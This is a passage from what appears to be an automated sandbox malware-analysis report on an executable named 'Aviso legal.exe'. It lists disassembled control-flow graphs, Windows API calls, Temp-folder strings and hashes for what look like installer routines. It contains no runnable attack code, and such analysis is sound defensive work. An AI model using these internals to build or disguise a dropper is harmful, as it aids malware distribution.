                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058B3
                                • ShowWindow.USER32(00000000), ref: 004058D7
                                • ShowWindow.USER32(?,00000008), ref: 004058DC
                                • ShowWindow.USER32(00000008), ref: 00405926
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                • CreatePopupMenu.USER32 ref: 0040596B
                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                • GetWindowRect.USER32(?,?), ref: 0040599F
                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                • EmptyClipboard.USER32 ref: 00405A06
                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                • CloseClipboard.USER32 ref: 00405A61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                • String ID: {
                                • API String ID: 4154960007-366298937
                                • Opcode ID: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                • Opcode Fuzzy Hash: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 455 405cc1-405cc2 call 405e58 449->455 456 405cb4-405cbf lstrcatW 449->456 450->447 454 405dba-405dbd 450->454 451->449 451->450 457 405dc7-405dcf call 406873 454->457 458 405dbf-405dc5 454->458 459 405cc7-405ccb 455->459 456->459 457->447 466 405dd1-405de5 call 405e0c call 405c01 457->466 458->447 462 405cd7-405cdd lstrcatW 459->462 463 405ccd-405cd5 459->463 465 405ce2-405cfe lstrlenW FindFirstFileW 462->465 463->462 463->465 467 405d04-405d0c 465->467 468 405da8-405dac 465->468 482 405de7-405dea 466->482 483 405dfd-405e00 call 40559f 466->483 471 405d2c-405d40 call 40653d 467->471 472 405d0e-405d16 467->472 468->450 470 405dae 468->470 470->450 484 405d42-405d4a 471->484 485 405d57-405d62 call 405c01 471->485 474 405d18-405d20 472->474 475 405d8b-405d9b FindNextFileW 472->475 474->471 479 405d22-405d2a 474->479 475->467 478 405da1-405da2 FindClose 475->478 478->468 479->471 479->475 482->458 489 405dec-405dfb call 40559f call 4062fd 482->489 483->447 484->475 486 405d4c-405d55 call 405c49 484->486 495 405d83-405d86 call 40559f 485->495 496 405d64-405d67 485->496 486->475 489->447 495->475 498 405d69-405d79 call 40559f call 4062fd 496->498 499 405d7b-405d81 496->499 498->475 499->475
                                APIs
                                • DeleteFileW.KERNELBASE(?,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstAE84.tmp,\*.*), ref: 00405CBA
                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                • FindClose.KERNELBASE(00000000), ref: 00405DA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nstAE84.tmp$\*.*
                                • API String ID: 2035342205-3100592058
                                • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                APIs
                                • FindFirstFileW.KERNELBASE(?,004302B8,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,00405F5D,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                • FindClose.KERNELBASE(00000000), ref: 0040688A
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nstAE84.tmp, xrefs: 00406873
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: C:\Users\user\AppData\Local\Temp\nstAE84.tmp
                                • API String ID: 2295610775-2550375725
                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 199 403fbe-403fc7 195->199 197 404171-404186 196->197 198 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->198 201 4041c6-4041cb call 4044e5 197->201 202 404188-40418b 197->202 198->197 203 403fc9-403fd6 SetWindowPos 199->203 204 403fdc-403fe3 199->204 218 4041d0-4041eb 201->218 206 40418d-404198 call 401389 202->206 207 4041be-4041c0 202->207 203->204 209 403fe5-403fff ShowWindow 204->209 210 404027-40402d 204->210 206->207 234 40419a-4041b9 SendMessageW 206->234 207->201 217 404466 207->217 211 404100-40410e call 404500 209->211 212 404005-404018 GetWindowLongW 209->212 214 404046-404049 210->214 215 40402f-404041 DestroyWindow 210->215 222 404468-40446f 211->222 212->211 219 40401e-404021 ShowWindow 212->219 223 40404b-404057 SetWindowLongW 214->223 224 40405c-404062 214->224 221 404443-404449 215->221 217->222 227 4041f4-4041fa 218->227 228 4041ed-4041ef call 40140b 218->228 219->210 221->217 230 40444b-404451 221->230 223->222 224->211 233 404068-404077 GetDlgItem 224->233 231 404200-40420b 227->231 232 404424-40443d DestroyWindow EndDialog 227->232 228->227 230->217 236 404453-40445c ShowWindow 230->236 231->232 237 404211-40425e call 40657a call 404499 * 3 GetDlgItem 231->237 232->221 238 404096-404099 233->238 239 404079-404090 SendMessageW IsWindowEnabled 233->239 234->222 236->217 266 404260-404265 237->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 237->267 241 40409b-40409c 238->241 242 40409e-4040a1 238->242 239->217 239->238 244 4040cc-4040d1 call 404472 241->244 245 4040a3-4040a9 242->245 246 4040af-4040b4 242->246 244->211 249 4040ea-4040fa SendMessageW 245->249 250 4040ab-4040ad 245->250 246->249 251 4040b6-4040bc 246->251 249->211 250->244 252 4040d3-4040dc call 40140b 251->252 253 4040be-4040c4 call 40140b 251->253 252->211 263 4040de-4040e8 252->263 262 4040ca 253->262 262->244 263->262 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->218 286 404339-40433b 275->286 286->218 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->221 291 40437e-4043ab CreateDialogParamW 288->291 289->217 290 404353-404359 289->290 290->218 292 40435f 290->292 291->221 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->217 293->217 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->221
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                • ShowWindow.USER32(?), ref: 00403FF6
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                • ShowWindow.USER32(?,00000004), ref: 00404021
                                • DestroyWindow.USER32 ref: 00404035
                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                • GetDlgItem.USER32(?,?), ref: 0040406D
                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                • GetDlgItem.USER32(?,00000001), ref: 00404133
                                • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                • EnableWindow.USER32(?,?), ref: 0040429C
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                • EnableMenuItem.USER32(00000000), ref: 004042B9
                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                • String ID:
                                • API String ID: 121052019-0
                                • Opcode ID: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                • Opcode Fuzzy Hash: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 314 403c72-403c9b call 403ec2 call 405f14 304->314 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->314 319 403ca1-403ca6 314->319 320 403d2d-403d35 call 405f14 314->320 319->320 321 403cac-403cc6 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 325 403ccb-403cd4 321->325 325->320 328 403cd6-403cda 325->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 332 403cec-403cf8 lstrlenW 328->332 333 403cdc-403ce9 call 405e39 328->333 345 403df3-403df6 330->345 346 403dfb-403e06 call 403ec2 330->346 334 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->334 335 403eb8 331->335 339 403d20-403d28 call 405e0c call 40653d 332->339 340 403cfa-403d08 lstrcmpiW 332->340 333->332 334->330 338 403eba-403ec1 335->338 339->320 340->339 344 403d0a-403d14 GetFileAttributesW 340->344 349 403d16-403d18 344->349 350 403d1a-403d1b call 405e58 344->350 345->338 354 403e0c-403e26 ShowWindow call 40689a 346->354 355 403e8f-403e90 call 405672 346->355 349->339 349->350 350->339 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->335 361->345 364 403ea5-403eac call 40140b 361->364 367 403e46-403e56 GetClassInfoW RegisterClassW 362->367 368 403e5c-403e7f DialogBoxParamW call 40140b 362->368 363->362 364->345 367->368 372 403e84-403e8d call 403b3c 368->372 372->338
                                APIs
                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\geokemi,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75E03420), ref: 00403CED
                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\geokemi,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\geokemi), ref: 00403D54
                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\geokemi$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                • API String ID: 1975747703-4154578928
                                • Opcode ID: 247e99db93e8ebfdf0a38293e80ea72ef88d87fbb8185d5a325867b954932979
                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                • Opcode Fuzzy Hash: 247e99db93e8ebfdf0a38293e80ea72ef88d87fbb8185d5a325867b954932979
                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 402 40325a-403262 call 403019 393->402 403 40313a-403141 393->403 397 403205-40321d call 4034e5 call 4034cf 394->397 398 403227-403251 GlobalAlloc call 4034e5 call 4032b4 394->398 395->380 397->395 425 40321f-403225 397->425 398->395 424 403264-403275 398->424 402->395 407 403143-403157 call 405fe8 403->407 408 4031bd-4031c1 403->408 414 4031cb-4031d1 407->414 422 403159-403160 407->422 413 4031c3-4031ca call 403019 408->413 408->414 413->414 415 4031e0-4031e8 414->415 416 4031d3-4031dd call 4069f7 414->416 415->390 423 4031ee 415->423 416->415 422->414 428 403162-403169 422->428 423->387 429 403277 424->429 430 40327d-403282 424->430 425->395 425->398 428->414 431 40316b-403172 428->431 429->430 432 403283-403289 430->432 431->414 433 403174-40317b 431->433 432->432 434 40328b-4032a6 SetFilePointer call 405fe8 432->434 433->414 435 40317d-40319d 433->435 438 4032ab 434->438 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->423 439->440 440->414 441 4031b9-4031bb 440->441 441->414
                                APIs
                                • GetTickCount.KERNEL32 ref: 0040308E
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Aviso legal.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Aviso legal.exe,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
